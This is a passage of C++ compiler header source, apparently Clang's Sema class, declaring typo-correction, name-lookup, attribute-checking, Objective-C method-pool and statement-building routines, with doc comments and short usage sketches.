bool VolatileArg,
bool RValueThis,
bool ConstThis,
bool VolatileThis);
typedef std::function<void(const TypoCorrection &)> TypoDiagnosticGenerator;
typedef std::function<ExprResult(Sema &, TypoExpr *, TypoCorrection)>
TypoRecoveryCallback;
private:
bool CppLookupName(LookupResult &R, Scope *S);
struct TypoExprState {
std::unique_ptr<TypoCorrectionConsumer> Consumer;
TypoDiagnosticGenerator DiagHandler;
TypoRecoveryCallback RecoveryHandler;
TypoExprState();
TypoExprState(TypoExprState &&other) noexcept;
TypoExprState &operator=(TypoExprState &&other) noexcept;
};
/// The set of unhandled TypoExprs and their associated state.
llvm::MapVector<TypoExpr *, TypoExprState> DelayedTypos;
/// Creates a new TypoExpr AST node.
TypoExpr *createDelayedTypo(std::unique_ptr<TypoCorrectionConsumer> TCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC);
// The set of known/encountered (unique, canonicalized) NamespaceDecls.
//
// The boolean value will be true to indicate that the namespace was loaded
// from an AST/PCH file, or false otherwise.
llvm::MapVector<NamespaceDecl*, bool> KnownNamespaces;
/// Whether we have already loaded known namespaces from an external
/// source.
bool LoadedExternalKnownNamespaces;
/// Helper for CorrectTypo and CorrectTypoDelayed used to create and
/// populate a new TypoCorrectionConsumer. Returns nullptr if typo correction
/// should be skipped entirely.
std::unique_ptr<TypoCorrectionConsumer>
makeTypoCorrectionConsumer(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
DeclContext *MemberContext, bool EnteringContext,
const ObjCObjectPointerType *OPT,
bool ErrorRecovery);
public:
const TypoExprState &getTypoExprState(TypoExpr *TE) const;
/// Clears the state of the given TypoExpr.
void clearDelayedTypo(TypoExpr *TE);
/// Look up a name, looking for a single declaration. Return
/// null if the results were absent, ambiguous, or overloaded.
///
/// It is preferable to use the elaborated form and explicitly handle
/// ambiguity and overloading.
NamedDecl *LookupSingleName(Scope *S, DeclarationName Name,
SourceLocation Loc,
LookupNameKind NameKind,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupBuiltin(LookupResult &R);
bool LookupName(LookupResult &R, Scope *S,
bool AllowBuiltinCreation = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
bool InUnqualifiedLookup = false);
bool LookupQualifiedName(LookupResult &R, DeclContext *LookupCtx,
CXXScopeSpec &SS);
bool LookupParsedName(LookupResult &R, Scope *S, CXXScopeSpec *SS,
bool AllowBuiltinCreation = false,
bool EnteringContext = false);
ObjCProtocolDecl *LookupProtocol(IdentifierInfo *II, SourceLocation IdLoc,
RedeclarationKind Redecl
= NotForRedeclaration);
bool LookupInSuper(LookupResult &R, CXXRecordDecl *Class);
void LookupOverloadedOperatorName(OverloadedOperatorKind Op, Scope *S,
QualType T1, QualType T2,
UnresolvedSetImpl &Functions);
LabelDecl *LookupOrCreateLabel(IdentifierInfo *II, SourceLocation IdentLoc,
SourceLocation GnuLabelLoc = SourceLocation());
DeclContextLookupResult LookupConstructors(CXXRecordDecl *Class);
CXXConstructorDecl *LookupDefaultConstructor(CXXRecordDecl *Class);
CXXConstructorDecl *LookupCopyingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupCopyingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXConstructorDecl *LookupMovingConstructor(CXXRecordDecl *Class,
unsigned Quals);
CXXMethodDecl *LookupMovingAssignment(CXXRecordDecl *Class, unsigned Quals,
bool RValueThis, unsigned ThisQuals);
CXXDestructorDecl *LookupDestructor(CXXRecordDecl *Class);
bool checkLiteralOperatorId(const CXXScopeSpec &SS, const UnqualifiedId &Id);
LiteralOperatorLookupResult LookupLiteralOperator(Scope *S, LookupResult &R,
ArrayRef<QualType> ArgTys,
bool AllowRaw,
bool AllowTemplate,
bool AllowStringTemplate,
bool DiagnoseMissing);
bool isKnownName(StringRef name);
/// Status of a function's emission with respect to the CUDA/HIP/OpenMP
/// host/device attributes.
enum class FunctionEmissionStatus {
Emitted,
CUDADiscarded, // Discarded due to CUDA/HIP hostness
OMPDiscarded, // Discarded due to OpenMP hostness
TemplateDiscarded, // Discarded due to uninstantiated templates
Unknown,
};
FunctionEmissionStatus getEmissionStatus(FunctionDecl *Decl,
bool Final = false);
// Whether the callee should be ignored in the CUDA/HIP/OpenMP host/device check.
bool shouldIgnoreInHostDeviceCheck(FunctionDecl *Callee);
void ArgumentDependentLookup(DeclarationName Name, SourceLocation Loc,
ArrayRef<Expr *> Args, ADLResult &Functions);
void LookupVisibleDecls(Scope *S, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool LoadExternal = true);
void LookupVisibleDecls(DeclContext *Ctx, LookupNameKind Kind,
VisibleDeclConsumer &Consumer,
bool IncludeGlobalScope = true,
bool IncludeDependentBases = false,
bool LoadExternal = true);
enum CorrectTypoKind {
CTK_NonError, // CorrectTypo used in a non error recovery situation.
CTK_ErrorRecovery // CorrectTypo used in normal error recovery.
};
TypoCorrection CorrectTypo(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind,
Scope *S, CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr,
bool RecordFailure = true);
TypoExpr *CorrectTypoDelayed(const DeclarationNameInfo &Typo,
Sema::LookupNameKind LookupKind, Scope *S,
CXXScopeSpec *SS,
CorrectionCandidateCallback &CCC,
TypoDiagnosticGenerator TDG,
TypoRecoveryCallback TRC, CorrectTypoKind Mode,
DeclContext *MemberContext = nullptr,
bool EnteringContext = false,
const ObjCObjectPointerType *OPT = nullptr);
/// Process any TypoExprs in the given Expr and its children,
/// generating diagnostics as appropriate and returning a new Expr if there
/// were typos that were all successfully corrected and ExprError if one or
/// more typos could not be corrected.
///
/// \param E The Expr to check for TypoExprs.
///
/// \param InitDecl A VarDecl to avoid because the Expr being corrected is its
/// initializer.
///
/// \param Filter A function applied to a newly rebuilt Expr to determine if
/// it is an acceptable/usable result from a single combination of typo
/// corrections. As long as the filter returns ExprError, different
/// combinations of corrections will be tried until all are exhausted.
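///
/// For illustration, a hypothetical filter (a hedged sketch, not an existing
/// caller) that only accepts corrected expressions of integral type:
/// \code
///   ExprResult Fixed = CorrectDelayedTyposInExpr(
///       E, /*InitDecl=*/nullptr, [](Expr *Candidate) -> ExprResult {
///         if (Candidate->getType()->isIntegerType())
///           return Candidate;
///         return ExprError(); // try another combination of corrections
///       });
/// \endcode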
ExprResult
CorrectDelayedTyposInExpr(Expr *E, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; });
ExprResult
CorrectDelayedTyposInExpr(Expr *E,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(E, nullptr, Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER, VarDecl *InitDecl = nullptr,
llvm::function_ref<ExprResult(Expr *)> Filter =
[](Expr *E) -> ExprResult { return E; }) {
return ER.isInvalid() ? ER : CorrectDelayedTyposInExpr(ER.get(), Filter);
}
ExprResult
CorrectDelayedTyposInExpr(ExprResult ER,
llvm::function_ref<ExprResult(Expr *)> Filter) {
return CorrectDelayedTyposInExpr(ER, nullptr, Filter);
}
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
bool ErrorRecovery = true);
void diagnoseTypo(const TypoCorrection &Correction,
const PartialDiagnostic &TypoDiag,
const PartialDiagnostic &PrevNote,
bool ErrorRecovery = true);
void MarkTypoCorrectedFunctionDefinition(const NamedDecl *F);
void FindAssociatedClassesAndNamespaces(SourceLocation InstantiationLoc,
ArrayRef<Expr *> Args,
AssociatedNamespaceSet &AssociatedNamespaces,
AssociatedClassSet &AssociatedClasses);
void FilterLookupForScope(LookupResult &R, DeclContext *Ctx, Scope *S,
bool ConsiderLinkage, bool AllowInlineNamespace);
bool CheckRedeclarationModuleOwnership(NamedDecl *New, NamedDecl *Old);
void DiagnoseAmbiguousLookup(LookupResult &Result);
//@}
/// Attempts to produce a RecoveryExpr after some AST node cannot be created.
ExprResult CreateRecoveryExpr(SourceLocation Begin, SourceLocation End,
ArrayRef<Expr *> SubExprs,
QualType T = QualType());
ObjCInterfaceDecl *getObjCInterfaceDecl(IdentifierInfo *&Id,
SourceLocation IdLoc,
bool TypoCorrection = false);
NamedDecl *LazilyCreateBuiltin(IdentifierInfo *II, unsigned ID,
Scope *S, bool ForRedeclaration,
SourceLocation Loc);
NamedDecl *ImplicitlyDefineFunction(SourceLocation Loc, IdentifierInfo &II,
Scope *S);
void AddKnownFunctionAttributesForReplaceableGlobalAllocationFunction(
FunctionDecl *FD);
void AddKnownFunctionAttributes(FunctionDecl *FD);
// More parsing and symbol table subroutines.
void ProcessPragmaWeak(Scope *S, Decl *D);
// Decl attributes - this routine is the top level dispatcher.
void ProcessDeclAttributes(Scope *S, Decl *D, const Declarator &PD);
// Helper for delayed processing of attributes.
void ProcessDeclAttributeDelayed(Decl *D,
const ParsedAttributesView &AttrList);
void ProcessDeclAttributeList(Scope *S, Decl *D, const ParsedAttributesView &AL,
bool IncludeCXX11Attributes = true);
bool ProcessAccessDeclAttributeList(AccessSpecDecl *ASDecl,
const ParsedAttributesView &AttrList);
void checkUnusedDeclAttributes(Declarator &D);
/// Map any API notes provided for this declaration to attributes on the
/// declaration.
///
/// Triggered by declaration-attribute processing.
void ProcessAPINotes(Decl *D);
/// Determine if type T is a valid subject for a nonnull and similar
/// attributes. By default, we look through references (the behavior used by
/// nonnull), but if the second parameter is true, then we treat a reference
/// type as valid.
bool isValidPointerAttrType(QualType T, bool RefOkay = false);
bool CheckRegparmAttr(const ParsedAttr &attr, unsigned &value);
bool CheckCallingConvAttr(const ParsedAttr &attr, CallingConv &CC,
const FunctionDecl *FD = nullptr);
bool CheckAttrTarget(const ParsedAttr &CurrAttr);
bool CheckAttrNoArgs(const ParsedAttr &CurrAttr);
bool checkStringLiteralArgumentAttr(const ParsedAttr &Attr, unsigned ArgNum,
StringRef &Str,
SourceLocation *ArgLocation = nullptr);
bool checkSectionName(SourceLocation LiteralLoc, StringRef Str);
bool checkTargetAttr(SourceLocation LiteralLoc, StringRef Str);
bool checkMSInheritanceAttrOnDefinition(
CXXRecordDecl *RD, SourceRange Range, bool BestCase,
MSInheritanceModel SemanticSpelling);
void CheckAlignasUnderalignment(Decl *D);
/// Adjust the calling convention of a method to be the ABI default if it
/// wasn't specified explicitly. This handles method types formed from
/// function type typedefs and typename template arguments.
void adjustMemberFunctionCC(QualType &T, bool IsStatic, bool IsCtorOrDtor,
SourceLocation Loc);
// Check if there is an explicit attribute, but only look through parens.
// The intent is to look for an attribute on the current declarator, but not
// one that came from a typedef.
bool hasExplicitCallingConv(QualType T);
/// Get the outermost AttributedType node that sets a calling convention.
/// Valid types should not have multiple attributes with different CCs.
const AttributedType *getCallingConvAttributedType(QualType T) const;
/// Check whether a nullability type specifier can be added to the given
/// type through some means not written in source (e.g. API notes).
///
/// \param type The type to which the nullability specifier will be
/// added. On success, this type will be updated appropriately.
///
/// \param nullability The nullability specifier to add.
///
/// \param diagLoc The location to use for diagnostics.
///
/// \param allowArrayTypes Whether to accept nullability specifiers on an
/// array type (e.g., because it will decay to a pointer).
///
/// \param overrideExisting Whether to override an existing, locally-specified
/// nullability specifier rather than complaining about the conflict.
///
/// \returns true if nullability cannot be applied, false otherwise.
bool checkImplicitNullabilityTypeSpecifier(QualType &type,
NullabilityKind nullability,
SourceLocation diagLoc,
bool allowArrayTypes,
bool overrideExisting);
/// Stmt attributes - this routine is the top level dispatcher.
StmtResult ProcessStmtAttributes(Stmt *Stmt,
const ParsedAttributesView &Attrs,
SourceRange Range);
void WarnConflictingTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
void CheckConflictingOverridingMethod(ObjCMethodDecl *Method,
ObjCMethodDecl *Overridden,
bool IsProtocolMethodDecl);
/// WarnExactTypedMethods - This routine issues a warning if a method
/// implementation declaration exactly matches that of its declaration.
void WarnExactTypedMethods(ObjCMethodDecl *Method,
ObjCMethodDecl *MethodDecl,
bool IsProtocolMethodDecl);
typedef llvm::SmallPtrSet<Selector, 8> SelectorSet;
/// CheckImplementationIvars - This routine checks whether the instance
/// variables listed in the implementation match those listed in the
/// interface.
void CheckImplementationIvars(ObjCImplementationDecl *ImpDecl,
ObjCIvarDecl **Fields, unsigned nIvars,
SourceLocation Loc);
/// ImplMethodsVsClassMethods - This is the main routine to warn if any method
/// remains unimplemented in the class or category \@implementation.
void ImplMethodsVsClassMethods(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool IncompleteImpl = false);
/// DiagnoseUnimplementedProperties - This routine warns on those properties
/// which must be implemented by this implementation.
void DiagnoseUnimplementedProperties(Scope *S, ObjCImplDecl* IMPDecl,
ObjCContainerDecl *CDecl,
bool SynthesizeProperties);
/// Diagnose any null-resettable synthesized setters.
void diagnoseNullResettableSynthesizedSetters(const ObjCImplDecl *impDecl);
/// DefaultSynthesizeProperties - This routine default synthesizes all
/// properties which must be synthesized in the class's \@implementation.
void DefaultSynthesizeProperties(Scope *S, ObjCImplDecl *IMPDecl,
ObjCInterfaceDecl *IDecl,
SourceLocation AtEnd);
void DefaultSynthesizeProperties(Scope *S, Decl *D, SourceLocation AtEnd);
/// IvarBacksCurrentMethodAccessor - This routine returns 'true' if 'IV' is
/// an ivar synthesized for 'Method' and 'Method' is a property accessor
/// declared in class 'IFace'.
bool IvarBacksCurrentMethodAccessor(ObjCInterfaceDecl *IFace,
ObjCMethodDecl *Method, ObjCIvarDecl *IV);
/// DiagnoseUnusedBackingIvarInAccessor - Issue an 'unused' warning if the
/// ivar which backs the property is not used in the property's accessor.
void DiagnoseUnusedBackingIvarInAccessor(Scope *S,
const ObjCImplementationDecl *ImplD);
/// GetIvarBackingPropertyAccessor - If the method is a property setter/getter
/// and its property has a backing ivar, returns this ivar; otherwise, returns
/// NULL. It also returns the ivar's property on success.
ObjCIvarDecl *GetIvarBackingPropertyAccessor(const ObjCMethodDecl *Method,
const ObjCPropertyDecl *&PDecl) const;
/// Called by ActOnProperty to handle \@property declarations in
/// class extensions.
ObjCPropertyDecl *HandlePropertyInClassExtension(Scope *S,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
unsigned &Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind);
/// Called by ActOnProperty and HandlePropertyInClassExtension to
/// handle creating the ObjcPropertyDecl for a category or \@interface.
ObjCPropertyDecl *CreatePropertyDecl(Scope *S,
ObjCContainerDecl *CDecl,
SourceLocation AtLoc,
SourceLocation LParenLoc,
FieldDeclarator &FD,
Selector GetterSel,
SourceLocation GetterNameLoc,
Selector SetterSel,
SourceLocation SetterNameLoc,
const bool isReadWrite,
const unsigned Attributes,
const unsigned AttributesAsWritten,
QualType T,
TypeSourceInfo *TSI,
tok::ObjCKeywordKind MethodImplKind,
DeclContext *lexicalDC = nullptr);
/// AtomicPropertySetterGetterRules - This routine enforces the rule (via a
/// warning) that an atomic property must not have a user-declared setter
/// without a user-declared getter, or vice versa.
void AtomicPropertySetterGetterRules(ObjCImplDecl* IMPDecl,
ObjCInterfaceDecl* IDecl);
void DiagnoseOwningPropertyGetterSynthesis(const ObjCImplementationDecl *D);
void DiagnoseMissingDesignatedInitOverrides(
const ObjCImplementationDecl *ImplD,
const ObjCInterfaceDecl *IFD);
void DiagnoseDuplicateIvars(ObjCInterfaceDecl *ID, ObjCInterfaceDecl *SID);
enum MethodMatchStrategy {
MMS_loose,
MMS_strict
};
/// MatchTwoMethodDeclarations - Checks whether two methods' types match and
/// returns true or false accordingly.
bool MatchTwoMethodDeclarations(const ObjCMethodDecl *Method,
const ObjCMethodDecl *PrevMethod,
MethodMatchStrategy strategy = MMS_strict);
/// MatchAllMethodDeclarations - Check methods declared in an interface or
/// protocol against those declared in their implementations.
void MatchAllMethodDeclarations(const SelectorSet &InsMap,
const SelectorSet &ClsMap,
SelectorSet &InsMapSeen,
SelectorSet &ClsMapSeen,
ObjCImplDecl* IMPDecl,
ObjCContainerDecl* IDecl,
bool &IncompleteImpl,
bool ImmediateClass,
bool WarnCategoryMethodImpl=false);
/// CheckCategoryVsClassMethodMatches - Checks whether methods implemented in
/// a category match those implemented in its primary class, and warns each
/// time an exact match is found.
void CheckCategoryVsClassMethodMatches(ObjCCategoryImplDecl *CatIMP);
/// Add the given method to the list of globally-known methods.
void addMethodToGlobalList(ObjCMethodList *List, ObjCMethodDecl *Method);
/// Returns the default address space for method qualifiers.
LangAS getDefaultCXXMethodAddrSpace() const;
private:
/// AddMethodToGlobalPool - Add an instance or factory method to the global
/// pool. See the description of AddInstanceMethodToGlobalPool.
void AddMethodToGlobalPool(ObjCMethodDecl *Method, bool impl, bool instance);
/// LookupMethodInGlobalPool - Returns the instance or factory method and
/// optionally warns if there are multiple signatures.
ObjCMethodDecl *LookupMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass,
bool instance);
public:
/// Returns instance or factory methods in the global method pool for the
/// given selector. It checks the desired kind first; if none is found and
/// the parameter CheckTheOther is set, it then checks the other kind. If no
/// such method or only one method is found, the function returns false;
/// otherwise, it returns true.
bool
CollectMultipleMethodsInGlobalPool(Selector Sel,
SmallVectorImpl<ObjCMethodDecl*>& Methods,
bool InstanceFirst, bool CheckTheOther,
const ObjCObjectType *TypeBound = nullptr);
bool
AreMultipleMethodsInGlobalPool(Selector Sel, ObjCMethodDecl *BestMethod,
SourceRange R, bool receiverIdOrClass,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
void
DiagnoseMultipleMethodInGlobalPool(SmallVectorImpl<ObjCMethodDecl*> &Methods,
Selector Sel, SourceRange R,
bool receiverIdOrClass);
private:
/// Returns the method which best matches the given argument list, or
/// nullptr if none could be found.
ObjCMethodDecl *SelectBestMethod(Selector Sel, MultiExprArg Args,
bool IsInstance,
SmallVectorImpl<ObjCMethodDecl*>& Methods);
/// Record the typo correction failure and return an empty correction.
TypoCorrection FailedCorrection(IdentifierInfo *Typo, SourceLocation TypoLoc,
bool RecordFailure = true) {
if (RecordFailure)
TypoCorrectionFailures[Typo].insert(TypoLoc);
return TypoCorrection();
}
public:
/// AddInstanceMethodToGlobalPool - All instance methods in a translation
/// unit are added to a global pool. This allows us to efficiently associate
/// a selector with a method declaration for purposes of typechecking
/// messages sent to "id" (where the class of the object is unknown).
void AddInstanceMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/true);
}
/// AddFactoryMethodToGlobalPool - Same as above, but for factory methods.
void AddFactoryMethodToGlobalPool(ObjCMethodDecl *Method, bool impl=false) {
AddMethodToGlobalPool(Method, impl, /*instance*/false);
}
/// AddAnyMethodToGlobalPool - Add any method, instance or factory to global
/// pool.
void AddAnyMethodToGlobalPool(Decl *D);
/// LookupInstanceMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupInstanceMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/true);
}
/// LookupFactoryMethodInGlobalPool - Returns the method and warns if
/// there are multiple signatures.
ObjCMethodDecl *LookupFactoryMethodInGlobalPool(Selector Sel, SourceRange R,
bool receiverIdOrClass=false) {
return LookupMethodInGlobalPool(Sel, R, receiverIdOrClass,
/*instance*/false);
}
const ObjCMethodDecl *SelectorsForTypoCorrection(Selector Sel,
QualType ObjectType=QualType());
/// LookupImplementedMethodInGlobalPool - Returns the method which has an
/// implementation.
ObjCMethodDecl *LookupImplementedMethodInGlobalPool(Selector Sel);
/// CollectIvarsToConstructOrDestruct - Collect those ivars which require
/// initialization.
void CollectIvarsToConstructOrDestruct(ObjCInterfaceDecl *OI,
SmallVectorImpl<ObjCIvarDecl*> &Ivars);
//===--------------------------------------------------------------------===//
// Statement Parsing Callbacks: SemaStmt.cpp.
public:
class FullExprArg {
public:
FullExprArg() : E(nullptr) { }
FullExprArg(Sema &actions) : E(nullptr) { }
ExprResult release() {
return E;
}
Expr *get() const { return E; }
Expr *operator->() {
return E;
}
private:
// FIXME: No need to make the entire Sema class a friend when it's just
// Sema::MakeFullExpr that needs access to the constructor below.
friend class Sema;
explicit FullExprArg(Expr *expr) : E(expr) {}
Expr *E;
};
FullExprArg MakeFullExpr(Expr *Arg) {
return MakeFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation());
}
FullExprArg MakeFullExpr(Expr *Arg, SourceLocation CC) {
return FullExprArg(
ActOnFinishFullExpr(Arg, CC, /*DiscardedValue*/ false).get());
}
FullExprArg MakeFullDiscardedValueExpr(Expr *Arg) {
ExprResult FE =
ActOnFinishFullExpr(Arg, Arg ? Arg->getExprLoc() : SourceLocation(),
/*DiscardedValue*/ true);
return FullExprArg(FE.get());
}
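/// A minimal usage sketch, assuming an in-scope Sema &S and a parsed
/// Expr *E (hypothetical locals): wrap E as a finished full-expression
/// before handing it to a statement builder.
/// \code
///   Sema::FullExprArg Cond = S.MakeFullExpr(E);
///   Expr *Finished = Cond.get(); // null if ActOnFinishFullExpr failed
/// \endcode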
StmtResult ActOnExprStmt(ExprResult Arg, bool DiscardedValue = true);
StmtResult ActOnExprStmtError();
StmtResult ActOnNullStmt(SourceLocation SemiLoc,
bool HasLeadingEmptyMacro = false);
void ActOnStartOfCompoundStmt(bool IsStmtExpr);
void ActOnFinishOfCompoundStmt();
StmtResult ActOnCompoundStmt(SourceLocation L, SourceLocation R,
ArrayRef<Stmt *> Elts, bool isStmtExpr);
/// An RAII object to enter the scope of a compound statement.
class CompoundScopeRAII {
public:
CompoundScopeRAII(Sema &S, bool IsStmtExpr = false) : S(S) {
S.ActOnStartOfCompoundStmt(IsStmtExpr);
}
~CompoundScopeRAII() {
S.ActOnFinishOfCompoundStmt();
}
private:
Sema &S;
};
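/// A minimal usage sketch, assuming an in-scope Sema &S: the RAII object
/// brackets the compound-statement callbacks so the finish callback runs
/// on every exit path.
/// \code
///   {
///     Sema::CompoundScopeRAII BodyScope(S);
///     // ... act on the statements of the body ...
///   } // ActOnFinishOfCompoundStmt() runs here
/// \endcode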
/// An RAII helper that pops a function scope on exit.
struct FunctionScopeRAII {
Sema &S;
bool Active;
FunctionScopeRAII(Sema &S) : S(S), Active(true) {}
~FunctionScopeRAII() {
if (Active)
S.PopFunctionScopeInfo();
}
void disable() { Active = false; }
};
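/// A minimal usage sketch, assuming an in-scope Sema &S: pop the function
/// scope on error paths, but disable the pop once the success path takes
/// over ownership.
/// \code
///   Sema::FunctionScopeRAII PopOnError(S);
///   if (/* ...analysis succeeded... */ true)
///     PopOnError.disable(); // success path pops the scope elsewhere
/// \endcode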
StmtResult ActOnDeclStmt(DeclGroupPtrTy Decl,
SourceLocation StartLoc,
SourceLocation EndLoc);
void ActOnForEachDeclStmt(DeclGroupPtrTy Decl);
StmtResult ActOnForEachLValueExpr(Expr *E);
ExprResult ActOnCaseExpr(SourceLocation CaseLoc, ExprResult Val);
StmtResult ActOnCaseStmt(SourceLocation CaseLoc, ExprResult LHS,
SourceLocation DotDotDotLoc, ExprResult RHS,
SourceLocation ColonLoc);
void ActOnCaseStmtBody(Stmt *CaseStmt, Stmt *SubStmt);
StmtResult ActOnDefaultStmt(SourceLocation DefaultLoc,
SourceLocation ColonLoc,
Stmt *SubStmt, Scope *CurScope);
StmtResult ActOnLabelStmt(SourceLocation IdentLoc, LabelDecl *TheDecl,
SourceLocation ColonLoc, Stmt *SubStmt);
StmtResult ActOnAttributedStmt(SourceLocation AttrLoc,
ArrayRef<const Attr*> Attrs,
Stmt *SubStmt);
class ConditionResult;
StmtResult ActOnIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult BuildIfStmt(SourceLocation IfLoc, bool IsConstexpr,
Stmt *InitStmt,
ConditionResult Cond, Stmt *ThenVal,
SourceLocation ElseLoc, Stmt *ElseVal);
StmtResult ActOnStartOfSwitchStmt(SourceLocation SwitchLoc,
Stmt *InitStmt,
ConditionResult Cond);
StmtResult ActOnFinishSwitchStmt(SourceLocation SwitchLoc,
Stmt *Switch, Stmt *Body);
StmtResult ActOnWhileStmt(SourceLocation WhileLoc, ConditionResult Cond,
Stmt *Body);
StmtResult ActOnDoStmt(SourceLocation DoLoc, Stmt *Body,
SourceLocation WhileLoc, SourceLocation CondLParen,
Expr *Cond, SourceLocation CondRParen);
StmtResult ActOnForStmt(SourceLocation ForLoc,
SourceLocation LParenLoc,
Stmt *First,
ConditionResult Second,
FullExprArg Third,
SourceLocation RParenLoc,
Stmt *Body);
ExprResult CheckObjCForCollectionOperand(SourceLocation forLoc,
Expr *collection);
StmtResult ActOnObjCForCollectionStmt(SourceLocation ForColLoc,
Stmt *First, Expr *collection,
SourceLocation RParenLoc);
StmtResult FinishObjCForCollectionStmt(Stmt *ForCollection, Stmt *Body);
enum BuildForRangeKind {
/// Initial building of a for-range statement.
BFRK_Build,
/// Instantiation or recovery rebuild of a for-range statement. Don't
/// attempt any typo-correction.
BFRK_Rebuild,
/// Determining whether a for-range statement could be built. Avoid any
/// unnecessary or irreversible actions.
BFRK_Check
};
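/// A minimal sketch of the BFRK_Check mode, assuming the parsed pieces are
/// in scope (hypothetical locals): probe whether a for-range interpretation
/// is viable without committing to any irreversible action.
/// \code
///   StmtResult Probe = S.ActOnCXXForRangeStmt(
///       CurScope, ForLoc, /*CoawaitLoc=*/SourceLocation(), InitStmt,
///       LoopVar, ColonLoc, Collection, RParenLoc, Sema::BFRK_Check);
/// \endcode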
StmtResult ActOnCXXForRangeStmt(Scope *S, SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
Stmt *LoopVar,
SourceLocation ColonLoc, Expr *Collection,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult BuildCXXForRangeStmt(SourceLocation ForLoc,
SourceLocation CoawaitLoc,
Stmt *InitStmt,
SourceLocation ColonLoc,
Stmt *RangeDecl, Stmt *Begin, Stmt *End,
Expr *Cond, Expr *Inc,
Stmt *LoopVarDecl,
SourceLocation RParenLoc,
BuildForRangeKind Kind);
StmtResult FinishCXXForRangeStmt(Stmt *ForRange, Stmt *Body);
StmtResult ActOnGotoStmt(SourceLocation GotoLoc,
SourceLocation LabelLoc,
LabelDecl *TheDecl);
StmtResult ActOnIndirectGotoStmt(SourceLocation GotoLoc,
SourceLocation StarLoc,
Expr *DestExp);
StmtResult ActOnContinueStmt(SourceLocation ContinueLoc, Scope *CurScope);
StmtResult ActOnBreakStmt(SourceLocation BreakLoc, Scope *CurScope);
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind, unsigned NumParams);
typedef std::pair<StringRef, QualType> CapturedParamNameType;
void ActOnCapturedRegionStart(SourceLocation Loc, Scope *CurScope,
CapturedRegionKind Kind,
ArrayRef<CapturedParamNameType> Params,
unsigned OpenMPCaptureLevel = 0);
StmtResult ActOnCapturedRegionEnd(Stmt *S);
void ActOnCapturedRegionError();
RecordDecl *CreateCapturedStmtRecordDecl(CapturedDecl *&CD,
SourceLocation Loc,
unsigned NumParams);
enum CopyElisionSemanticsKind {
CES_Strict = 0,
CES_AllowParameters = 1,
CES_AllowDifferentTypes = 2,
CES_AllowExceptionVariables = 4,
CES_FormerDefault = (CES_AllowParameters),
CES_Default = (CES_AllowParameters | CES_AllowDifferentTypes),
CES_AsIfByStdMove = (CES_AllowParameters | CES_AllowDifferentTypes |
CES_AllowExceptionVariables),
};
VarDecl *getCopyElisionCandidate(QualType ReturnType, Expr *E,
CopyElisionSemanticsKind CESK);
bool isCopyElisionCandidate(QualType ReturnType, const VarDecl *VD,
CopyElisionSemanticsKind CESK);
StmtResult ActOnReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp,
Scope *CurScope);
StmtResult BuildReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnCapScopeReturnStmt(SourceLocation ReturnLoc, Expr *RetValExp);
StmtResult ActOnGCCAsmStmt(SourceLocation AsmLoc, bool IsSimple,
bool IsVolatile, unsigned NumOutputs,
unsigned NumInputs, IdentifierInfo **Names,
MultiExprArg Constraints, MultiExprArg Exprs,
Expr *AsmString, MultiExprArg Clobbers,
unsigned NumLabels,
SourceLocation RParenLoc);
void FillInlineAsmIdentifierInfo(Expr *Res,
llvm::InlineAsmIdentifierInfo &Info);
ExprResult LookupInlineAsmIdentifier(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
UnqualifiedId &Id,
bool IsUnevaluatedContext);
bool LookupInlineAsmField(StringRef Base, StringRef Member,
unsigned &Offset, SourceLocation AsmLoc);
ExprResult LookupInlineAsmVarDeclField(Expr *RefExpr, StringRef Member,
SourceLocation AsmLoc);
StmtResult ActOnMSAsmStmt(SourceLocation AsmLoc, SourceLocation LBraceLoc,
ArrayRef<Token> AsmToks,
StringRef AsmString,
unsigned NumOutputs, unsigned NumInputs,
ArrayRef<StringRef> Constraints,
ArrayRef<StringRef> Clobbers,
ArrayRef<Expr*> Exprs,
SourceLocation EndLoc);
